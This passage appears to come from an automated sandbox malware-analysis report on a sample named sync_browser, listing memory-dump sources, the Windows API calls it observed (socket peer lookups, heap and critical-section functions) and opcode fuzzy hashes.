                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: getpeernameinet_ntoa
                                                                    • String ID: <unavailable>
                                                                    • API String ID: 1982201544-1096956887
                                                                    • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                    • Instruction ID: bd8af5b806339b42b3d5ab94b72a260b7391faa273a0ccd6ab3709cdfe0ce55e
                                                                    • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                    • Instruction Fuzzy Hash: 59F08275A1874985EF209F00EC9126D7364FB88798F800032E54D43764DF3CE227CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID:
                                                                    • API String ID: 1225357528-0
                                                                    • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                    • Instruction ID: 8f2e6e85530c08a740d5b0b57f8b747b97e7ded22b9642d5186c268dbf923263
                                                                    • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                    • Instruction Fuzzy Hash: 7311B101F1C1AA82FA40E766BA4177E42159F84BC8F481132FE0E8BB8BDE1DD4A38704
                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC157338
                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC157352
                                                                    • InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC15739C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC1573E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInitializeLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 3200804837-0
                                                                    • Opcode ID: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                    • Instruction ID: 73244e87e460e2dce9e98eedffc6c3cb4c810e3f5e294453e48f9ba6d9bd1911
                                                                    • Opcode Fuzzy Hash: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                    • Instruction Fuzzy Hash: 18213C31A29B5A92EA448F11E94027C73A8FB48B94F048136DA8D83750DF3CE4B7C740